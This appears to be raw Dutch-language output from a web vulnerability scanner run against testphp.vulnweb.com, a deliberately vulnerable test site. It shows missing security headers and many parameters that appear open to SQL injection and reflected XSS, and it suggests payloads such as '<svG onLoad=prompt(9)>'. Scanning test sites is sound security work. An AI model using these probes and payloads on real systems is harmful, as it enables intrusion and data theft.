[i] RESULTATEN VAN DE PORTSCAN:
-----------------------
[i] Host: 127.0.0.1 (localhost)
[i] Status: up
-----------------------
[i] De scan heeft 0.43 seconden geduurd.
[i] 1 host(s) gescand op poorten 1-100.
None

[i] RESULTATEN VAN DE HTTP HEADER CONTROLE: 
-----------------------
[i] Response header opgehaald van http://testphp.vulnweb.com
[i] Controleren op NCSC waarden...
-----
[!] X-Content-Type-Options mist.
[!] Content-Security-Policy mist.
[!] Referrer-Policy mist.
[!] Strict-Transport-Security mist.
[!] X-Frame-Options mist.
------------

Controleren op onnodige request methodes:
-----
[*] Ophalen van response header met request method GET is mogelijk.
[*] Ophalen van response header met request method POST is mogelijk.
[*] Ophalen van response header met request method HEAD is mogelijk.
------------

{'Server': 'nginx/1.19.0', 'Date': 'Tue, 21 Jun 2022 12:11:21 GMT', 'Content-Type': 'text/html', 'Content-Length': '157', 'Connection': 'keep-alive'}
Server nginx/1.19.0
Controleren op mogelijk overbodige headers:
-----
[i] Server: nginx/1.19.0
[i] Date: Tue, 21 Jun 2022 12:11:21 GMT
False

[i] RESULTATEN VAN DE TLS-SCAN:
[i] http://testphp.vulnweb.com maakt gebruik van TLS-versies: 
[i] http://testphp.vulnweb.com maakt gebruik van 0 ciphers.
None

[i] MOGELIJKE XSS-KWETSBAARHEDEN: 
ulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjon'"(){}<x>:/1zqjon;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjzz'%22()%7B%7D%3Cx%3E:/1zqjzz;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjzz'"(){}<x>:/1zqjzz;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"><svG onLoad=prompt(9)>, x"/onmouseover=prompt(9)/", x" onmouseover=prompt(9) "
[i] Line: <a href="params.php?p=valid&pp=1zqjzz'"(){}<x>:/1zqjzz;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjmf'%22()%7B%7D%3Cx%3E:/1zqjmf;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjmf'"(){}<x>:/1zqjmf;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjmf'"(){}<x>:/1zqjmf;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjmw'%22()%7B%7D%3Cx%3E:/1zqjmw;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjmw'"(){}<x>:/1zqjmw;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjmw'"(){}<x>:/1zqjmw;9

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjmk'%22()%7B%7D%3Cx%3E:/1zqjmk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjmk'"(){}<x>:/1zqjmk;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjaa'%22()%7B%7D%3Cx%3E:/1zqjaa;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjaa'"(){}<x>:/1zqjaa;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjaa'%22()%7B%7D%3Cx%3E:/1zqjaa;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjaa'"(){}<x>:/1zqjaa;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjaa;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjub'%22()%7B%7D%3Cx%3E:/1zqjub;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjub'"(){}<x>:/1zqjub;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjub'%22()%7B%7D%3Cx%3E:/1zqjub;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjub'"(){}<x>:/1zqjub;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjub;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjkl'%22()%7B%7D%3Cx%3E:/1zqjkl;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjkl'"(){}<x>:/1zqjkl;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjkl'%22()%7B%7D%3Cx%3E:/1zqjkl;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjkl'"(){}<x>:/1zqjkl;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjkl;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjir'%22()%7B%7D%3Cx%3E:/1zqjir;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjir'"(){}<x>:/1zqjir;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjir'"(){}<x>:/1zqjir;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjvq'%22()%7B%7D%3Cx%3E:/1zqjvq;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvq'"(){}<x>:/1zqjvq;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjvj'%22()%7B%7D%3Cx%3E:/1zqjvj;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvj'"(){}<x>:/1zqjvj;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjli'%22()%7B%7D%3Cx%3E:/1zqjli;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjli'"(){}<x>:/1zqjli;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjuw'%22()%7B%7D%3Cx%3E:/1zqjuw;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjuw'"(){}<x>:/1zqjuw;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjuw'"(){}<x>:/1zqjuw;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjur'%22()%7B%7D%3Cx%3E:/1zqjur;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjur'"(){}<x>:/1zqjur;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjdy'%22()%7B%7D%3Cx%3E:/1zqjdy;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdy'"(){}<x>:/1zqjdy;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjol'%22()%7B%7D%3Cx%3E:/1zqjol;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjol'"(){}<x>:/1zqjol;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjol'"(){}<x>:/1zqjol;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjmg'%22()%7B%7D%3Cx%3E:/1zqjmg;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjmg'"(){}<x>:/1zqjmg;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjmg'"(){}<x>:/1zqjmg;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjuo'%22()%7B%7D%3Cx%3E:/1zqjuo;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjuo'"(){}<x>:/1zqjuo;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjuo'"(){}<x>:/1zqjuo;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjnd'%22()%7B%7D%3Cx%3E:/1zqjnd;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjnd'"(){}<x>:/1zqjnd;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjnd'"(){}<x>:/1zqjnd;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjds'%22()%7B%7D%3Cx%3E:/1zqjds;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjds'"(){}<x>:/1zqjds;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjqn'%22()%7B%7D%3Cx%3E:/1zqjqn;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjqn'"(){}<x>:/1zqjqn;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjqn'"(){}<x>:/1zqjqn;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjvi'%22()%7B%7D%3Cx%3E:/1zqjvi;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvi'"(){}<x>:/1zqjvi;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjlx'%22()%7B%7D%3Cx%3E:/1zqjlx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjlx'"(){}<x>:/1zqjlx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjlx'%22()%7B%7D%3Cx%3E:/1zqjlx;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjlx'"(){}<x>:/1zqjlx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjlx;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvd'%22()%7B%7D%3Cx%3E:/1zqjvd;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjvd'"(){}<x>:/1zqjvd;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjvd'%22()%7B%7D%3Cx%3E:/1zqjvd;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjvd'"(){}<x>:/1zqjvd;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjvd;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjne'%22()%7B%7D%3Cx%3E:/1zqjne;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjne'"(){}<x>:/1zqjne;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjgu'%22()%7B%7D%3Cx%3E:/1zqjgu;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjgu'"(){}<x>:/1zqjgu;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjnk'%22()%7B%7D%3Cx%3E:/1zqjnk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjnk'"(){}<x>:/1zqjnk;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjnk'%22()%7B%7D%3Cx%3E:/1zqjnk;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjnk'"(){}<x>:/1zqjnk;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjnk;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjwg'%22()%7B%7D%3Cx%3E:/1zqjwg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjwg'"(){}<x>:/1zqjwg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjwg'%22()%7B%7D%3Cx%3E:/1zqjwg;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjwg'"(){}<x>:/1zqjwg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjwg;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.
